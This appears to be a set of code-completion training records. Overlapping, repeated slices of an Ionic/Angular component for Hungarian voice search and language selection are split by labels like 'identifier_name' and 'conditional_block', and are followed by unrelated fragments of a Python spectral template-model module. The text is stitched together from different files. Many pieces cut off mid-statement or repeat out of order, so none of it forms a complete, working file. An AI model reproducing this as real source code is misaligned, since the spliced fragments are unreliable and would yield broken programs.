this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
ask | {
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get | Permission()
| identifier_name |
menus.component.ts | );
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
| else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// | this.openSpeech();
}
| conditional_block |
menus.component.ts | );
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) |
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// | {
this.iab.create( url, '_system' );
} | identifier_body |
menus.component.ts | ('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2"); | this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh(); | random_line_split |
|
template_model.py | (parameters_values)), "You didn't specify all parameters' values."
        # Make sure we are dealing with arrays (lists will be transformed)
        if not isinstance(differential_fluxes, u.Quantity):
            differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
        differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
        n_parameters = parameters_values.shape[0]
        assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
                                                                        "the same number of elements"
        # Now set the corresponding values in the data frame
        try:
            self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
        except KeyError:
            raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
| self.K.unit = y_unit
self.scale.unit = 1 / x_unit | identifier_body |
|
template_model.py | self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
